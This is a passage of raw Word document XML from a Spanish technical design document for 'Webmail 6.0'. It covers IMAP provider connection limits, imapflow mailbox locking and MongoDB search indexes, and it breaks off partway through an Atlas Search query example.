              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">250 conexiones simultáneas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alto límite; OAuth2 obligatorio desde marzo 2025</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[58]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Outlook/Exchange Online</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20 conexiones simultáneas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restricción agresiva; planificar cuidadosamente pooling</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[59]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fastmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">50 conexiones simultáneas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Soporte completo de CONDSTORE/QRESYNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dovecot (self-hosted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Configurable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Típicamente 100+ por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 respeta estos límites manteniendo un máximo de 1 conexión activa por cuenta de usuario, compartida entre todas las operaciones (sync, IDLE, búsqueda). Para operaciones que requieren acceso simultáneo a múltiples carpetas (mover correos entre carpetas, búsqueda cross-folder), las operaciones se serializan sobre la misma conexión mediante el sistema de mailbox locking de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">imapflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="mailbox-locking-imapflow"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.4.3 Mailbox locking imapflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">imapflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementa locking de mailbox a través del método</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getMailboxLock()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que garantiza acceso exclusivo a una carpeta durante la ejecución de un bloque de código. Este mecanismo es esencial para prevenir condiciones de carrera cuando múltiples operaciones concurrentes intentan interactuar con la misma carpeta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock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getMailboxLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Solo este bloque puede interactuar con INBOX</w:t>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messageFlagsAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid</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Seen'</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messageMove</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Archive'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">finally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Siempre liberar, incluso ante excepción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El patrón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">try/finally</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asegura que el lock se libera incluso si una excepción interrumpe la operación, previniendo deadlocks que dejarían la conexión inutilizable.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="173" w:name="búsqueda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5 Búsqueda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La búsqueda de correos es una operación de alto impacto en la experiencia de usuario. Webmail 6.0 implementa una estrategia de tres niveles que prioriza velocidad local y recurre al servidor IMAP solo cuando es necesario.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="170" w:name="X16a45bd783da66bc6b384d3da41057128c0ec1d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5.1 MongoDB compound indexes en subject/from/to/textPreview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para búsquedas exactas y prefijos, MongoDB compound indexes proporcionan respuestas en milisegundos sobre datasets de cientos de miles de correos. La regla ESR (Equality → Sort → Range) guía el diseño de índices</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Índice principal para queries de bandeja ordenadas por fecha</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createIndex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId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mailbox</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date</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ataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Índice para búsqueda por remitente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createIndex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId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"from.address"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date</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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Índice para búsqueda por asunto (case-insensitive con collation)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createIndex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId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subject</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">collation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">locale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'en'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">strength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// strength 2 = case-insensitive</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Índice de texto sobre preview para búsqueda básica full-text</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createIndex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId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subject</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">textPreview</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"from.name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">weights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</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textPreview</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"from.name"</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"email_search_text"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El índice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como prefijo de todos los índices compuestos es esencial para la segmentación de datos por usuario. Sin este prefijo, un índice escanearía correos de todas las cuentas, degradando gravemente el rendimiento en instancias multi-usuario.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="atlas-search-para-full-text-avanzado"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5.2 Atlas Search para full-text avanzado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MongoDB Atlas Search, basado en Apache Lucene, proporciona capacidades de búsqueda full-text integradas sin infraestructura adicional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cuando Atlas Search está disponible, las búsquedas se ejecutan mediante el stage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del aggregation pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailHeaders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aggregate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'email_search'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">compound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">must</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
